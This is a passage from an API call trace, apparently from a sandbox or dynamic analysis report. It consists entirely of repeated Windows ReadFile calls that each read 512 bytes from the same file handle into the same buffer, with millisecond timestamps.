[0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, 
lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: 
lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, 
lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, 
lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile 
(in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 
[0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, 
lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, 
lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: 
lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.027] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.028] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, 